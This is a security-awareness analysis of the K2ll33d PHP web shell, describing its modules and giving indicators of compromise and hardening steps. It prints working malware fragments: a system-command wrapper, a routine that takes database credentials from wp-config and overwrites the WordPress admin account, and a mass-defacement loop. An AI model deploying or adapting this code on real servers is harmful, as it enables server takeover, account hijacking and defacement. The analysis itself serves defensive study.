⚠️ Warning: This article is for educational purposes and security awareness only. The information provided should be used solely to protect systems and respond to security incidents in an ethical and legal manner.
K2ll33d Shell is an advanced PHP web shell used by attackers to remotely control compromised web servers. Unlike simpler shells, this malware offers a complete graphical interface and numerous functionalities that facilitate the exploitation of vulnerable systems.
- 🖥️ Graphical interface: Design with menus, forms, and CSS styles
- 📂 File navigation: Complete exploration of the file system
- 💻 Command execution: Terminal to execute system commands
- 🔌 CMS tools: Specific functions for WordPress and Joomla
- 🌐 Remote connections: Bind shell, reverse shell, and Metasploit connection
- 🔨 Hacking tools: Symlinker, mass defacer, brute forcer, etc.
The analyzed code is an extensive PHP script (over 2000 lines) that implements multiple malicious functionalities. When loaded on a compromised server, it provides a web interface from which the attacker can control the system.
💡 Basic operation: The shell is loaded onto the server through vulnerabilities such as SQL injection, unvalidated file uploads, or compromised credentials. Once installed, the attacker accesses it through a web browser.
The code begins with basic functions for manipulating files and executing commands:
// Function to execute system commands
function exe($cmd) {
if(function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('exec')) {
@exec($cmd,$results);
$buff = "";
foreach($results as $result) {
$buff .= $result;
}
return $buff;
} elseif(function_exists('passthru')) {
// Alternative code...
}
}The shell implements multiple modules accessible from its main menu:
- 📁 File Explorer: Allows navigation through the file system, creating, editing, deleting, and downloading files.
- 🖲️ Shell: Provides a terminal to execute system commands.
- 📤 Upload: Allows uploading files to the server from the local machine or from remote URLs.
- 🔗 Symlinker: Creates symbolic links to access files outside the web directory.
- 📝 Eval PHP: Executes arbitrary PHP code on the server.
- 📡 Remote Connection: Establishes bind shell or reverse shell connections.
- 🗄️ MySQL Manager: Interface for managing MySQL databases.
- 🧨 Mass Defacer: Modifies multiple files simultaneously.
- 🔓 Brute Force: Attacks services like FTP or cPanel using brute force.
- 🎯 Joomla/WordPress Tools: Specific tools to compromise these CMS.
The code includes a function to change WordPress admin credentials:
// Simplified fragment of the code
if ($_POST['kill']) {
$url = $_POST['url'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$pss = md5($pass);
// Extract configuration information
$config = file_get_contents($url);
$password = enter($config,"define('DB_PASSWORD', '","');");
$username = enter($config,"define('DB_USER', '","');");
$db = enter($config,"define('DB_NAME', '","');");
$prefix = enter($config,'$table_prefix = \'',"';");
$host = enter($config,"define('DB_HOST', '","');");
// Connect to the database
$conn = @mysql_connect($host,$username,$password);
@mysql_select_db($db,$conn);
// Update admin credentials
$query = mysql_query("UPDATE `".$prefix."users` SET `user_login` = '".$user."',`user_pass` = '".$pss."' WHERE `ID` = 1");
}K2ll33d Shell implements several techniques to evade detection:
- 🔄 Use of multiple alternative functions when the main ones are disabled
- 🛡️ Ability to operate in PHP's "safe_mode"
- 🔒 Obfuscation of parts of the code using base64
- 📡 Communication with external servers controlled by the attacker
The following indicators may suggest that a server has been compromised with this web shell:
- 📄 Suspicious PHP files with random names or that attempt to appear legitimate
- 🔄 Unexpected modifications to system files
- 📶 Unusual network traffic to unknown IP addresses
- 📈 Unexplained increase in server resource usage
- 👤 New administrator accounts or changes in existing user permissions
- 🔄 Keep all software updated (CMS, plugins, themes)
- 🔑 Implement robust password policies and two-factor authentication
- 🔒 Configure restrictive permissions on the file system
- 🧱 Use Web Application Firewall (WAF)
- 👁️ Monitor file integrity with tools like Tripwire
- ⛔ Disable dangerous PHP functions like
system(),exec(),shell_exec() - 💾 Regularly create and verify backups
⚠️ Important: If you discover this type of code on your server, you should consider it compromised. Isolate the server, preserve evidence, remove the malware, restore from clean backups, and change all credentials before putting the system back into production.
The shell contains several sophisticated modules for attacking different systems:
// Mass defacement function
elseif(isset($_GET['x']) && ($_GET['x'] == 'mass')){
error_reporting(0);
?><center><br><br><div class="mybox"><h2 class="k2ll33d2">Folder Mass Defacer</h2>
<center/><br><center><form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=post>
Folder :<br/><input class="inputz" typ=text name=path size=60 value="<?=getcwd();?>">
<br>File Name :<br/><input class="inputz" typ=text name=file size=60 value="index.php">
<br>index URL :<br/><input class="inputz" typ=text name=url size=60 value="">
<br><input class="inputzbut" type=submit value=Deface></form></div></center>
<?php @error_reporting(0);
$mainpath=$_POST[path];
$file=$_POST[file];
$indexurl=$_POST[url];
echo "<br>";
$dir=opendir("$mainpath");
while($row=readdir($dir)){
$start=@fopen("$row/$file","w+");
$code=@file_get_contents($indexurl);
$finish=@fwrite($start,$code);
if ($finish){
echo "» $row/$file » Done<br><br>";
}
}
}K2ll33d Shell represents a significant threat to web servers due to its versatility and powerful capabilities. Understanding how this malicious tool works is essential for implementing effective protection measures and responding appropriately to security incidents.